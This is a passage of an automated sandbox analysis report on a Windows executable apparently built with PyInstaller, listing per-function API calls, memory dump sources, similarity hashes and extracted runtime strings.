                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E311D035B18A4182F3608B92E85472976A8FB89BE5F440234EA6EC77E4EF3DD904C740
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF6F0BD9216), ref: 00007FF6F0BD8592
                                                                                                                                                                                                                                                                • K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF6F0BD9216), ref: 00007FF6F0BD85E9
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BD9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6F0BD45E4,00000000,00007FF6F0BD1985), ref: 00007FF6F0BD9439
                                                                                                                                                                                                                                                                • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF6F0BD9216), ref: 00007FF6F0BD8678
                                                                                                                                                                                                                                                                • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF6F0BD9216), ref: 00007FF6F0BD86E4
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,00000000,00007FF6F0BD9216), ref: 00007FF6F0BD86F5
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,00000000,00007FF6F0BD9216), ref: 00007FF6F0BD870A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3462794448-0
                                                                                                                                                                                                                                                                • Opcode ID: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
                                                                                                                                                                                                                                                                • Instruction ID: 0ef6f20dda38a34aa6ed094f57ae08ab0b7df4001c51ce10687f89d8e248adfb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F441E562B1A68251E7309F11A5046AAA395FF86BD5F840131DF6ED7BC9FE3DE401C700
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF6F0BE4F81,?,?,?,?,00007FF6F0BEA4FA,?,?,?,?,00007FF6F0BE71FF), ref: 00007FF6F0BEB347
                                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6F0BE4F81,?,?,?,?,00007FF6F0BEA4FA,?,?,?,?,00007FF6F0BE71FF), ref: 00007FF6F0BEB37D
                                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6F0BE4F81,?,?,?,?,00007FF6F0BEA4FA,?,?,?,?,00007FF6F0BE71FF), ref: 00007FF6F0BEB3AA
                                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6F0BE4F81,?,?,?,?,00007FF6F0BEA4FA,?,?,?,?,00007FF6F0BE71FF), ref: 00007FF6F0BEB3BB
                                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6F0BE4F81,?,?,?,?,00007FF6F0BEA4FA,?,?,?,?,00007FF6F0BE71FF), ref: 00007FF6F0BEB3CC
                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(?,?,?,00007FF6F0BE4F81,?,?,?,?,00007FF6F0BEA4FA,?,?,?,?,00007FF6F0BE71FF), ref: 00007FF6F0BEB3E7
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                                                                                                • Opcode ID: 6d8f3e74ebbb6b3e9df47af100808aa7e96d944c008937dd2b032c21f4d9a902
                                                                                                                                                                                                                                                                • Instruction ID: 498e2a346c6e4d6ad3005ace1b4cd4972917cc49782e3d3440c486b9754c78e5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6d8f3e74ebbb6b3e9df47af100808aa7e96d944c008937dd2b032c21f4d9a902
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F8114720B0C642A2FB54A721569253E62569F4A7B0F948774E83FC67DBFE3EB4018305
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6F0BD1B6A), ref: 00007FF6F0BD295E
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                                • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                                                • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                                                • Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                                                                                • Instruction ID: 849db7d120f753c6d905a6fee6b2a74acd22be8ef9b34388b567b721fa819d15
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE312626B1968162E7209761A8406E7A395BF897D4F800132EE9EC37C5FF3DD146C300
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                                                • String ID: Unhandled exception in script
                                                                                                                                                                                                                                                                • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                                                • Opcode ID: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
                                                                                                                                                                                                                                                                • Instruction ID: 13a9d47979c9959116efc00275545185385d379e74e573f891bde93df243b9cd
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D31C47660968299EB20DF61F8556F96364FF8A784F800131EE5E87B8AEF3DC104C700
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF6F0BD918F,?,00007FF6F0BD3C55), ref: 00007FF6F0BD2BA0
                                                                                                                                                                                                                                                                • MessageBoxW.USER32 ref: 00007FF6F0BD2C2A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                                                • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                                                • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                                                • Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                                                                                • Instruction ID: db4af9d99140d13ef61edf2c45e588141658d9e87194cf05147acc2d73963dad
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D921D166709B81A2E7109B54F8447AA63A5EB89784F800132EA8E9779AEF3DD205C700
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF6F0BD1B99), ref: 00007FF6F0BD2760
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                                • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                                                • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                                                                • Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                                                                                • Instruction ID: 58477a0e701500fbf40e235bc99630d023dc2420efa3178a9134585124fcbe38
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D21A176A19782A2E720DB50B8417E6A3A4EF89384F800131EE9E93799EF3DD5458700
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                • Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                                                                                                                                                                                • Instruction ID: 1232f706875bfb8d41ec79013348bb84748a80c6e052c3eb01c13e84141742bb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 23F04F65A19606A1EB108B64A455B7A5324AF46762F940235DA7FC73E4EF2ED048C300
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _set_statfp
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1156100317-0
                                                                                                                                                                                                                                                                • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                                • Instruction ID: 5f7e2e24d6ede3e7840de582d882e6ba251ff8385d6931e8aab55e526dbae262
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0211BF7AE0CA1321F77411A8E456375204C6F7B362F840634EE7FC77DEAE2EA8424100
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FlsGetValue.KERNEL32(?,?,?,00007FF6F0BEA613,?,?,00000000,00007FF6F0BEA8AE,?,?,?,?,?,00007FF6F0BEA83A), ref: 00007FF6F0BEB41F
                                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6F0BEA613,?,?,00000000,00007FF6F0BEA8AE,?,?,?,?,?,00007FF6F0BEA83A), ref: 00007FF6F0BEB43E
                                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6F0BEA613,?,?,00000000,00007FF6F0BEA8AE,?,?,?,?,?,00007FF6F0BEA83A), ref: 00007FF6F0BEB466
                                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6F0BEA613,?,?,00000000,00007FF6F0BEA8AE,?,?,?,?,?,00007FF6F0BEA83A), ref: 00007FF6F0BEB477
                                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6F0BEA613,?,?,00000000,00007FF6F0BEA8AE,?,?,?,?,?,00007FF6F0BEA83A), ref: 00007FF6F0BEB488
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                                                                                                                • Opcode ID: 3cf0457813ef902b4d16e29671bd05b92734aec0d3ae5f0b4a86182189680110
                                                                                                                                                                                                                                                                • Instruction ID: 5098c67132a8d9191e1c72c378cffcd9c9f5a47eebdc4a4831a1dcb0feceec16
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3cf0457813ef902b4d16e29671bd05b92734aec0d3ae5f0b4a86182189680110
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F114F60B0C643A2FB589725555157A61665F867B0F848374E93FC67D7FE3EB4018301
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                                                                                                                • Opcode ID: 58ce09dd5263def6ec13d4cefdd98fc26a3f0444d111e578bd11d526dfe727f7
                                                                                                                                                                                                                                                                • Instruction ID: d1fdb636a646d318e2a35fc9ebbffe2a19788d3f82a7c43097d109001c88b5c2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 58ce09dd5263def6ec13d4cefdd98fc26a3f0444d111e578bd11d526dfe727f7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A6111560E0C207A2FFA86621445267E22924F47331F9897B4D93FCA3C3FD3EB4018241
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                • String ID: verbose
                                                                                                                                                                                                                                                                • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                                                • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                                                • Instruction ID: c55df2e6c0694ca746d1b9d050d2184e989314500516ef87d857b70608070f5a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6291CE32A08A46A1F7668E24D45037D33A1AB42BD4FC44276DA6F873D6FF3EE8058301
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                                                • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                                                • Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                                                                                • Instruction ID: 56de44e8f1467f795415ae8338c1b721cc165b2d436b73675951195d09786025
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 73818F72F08243A5FB644E2585102782AA0EB13B49FE580B5DA2BD73D6FF2FB9019341
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                                • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                                                • Opcode ID: c7f5fdff7c0b40b6635b3f9850cf21a5be83d788788a684f503aa9329af71794
                                                                                                                                                                                                                                                                • Instruction ID: 9ac106860b6b787191b920a5d593524cb2c303b69bb5fbe3892b9a9ea95b391a
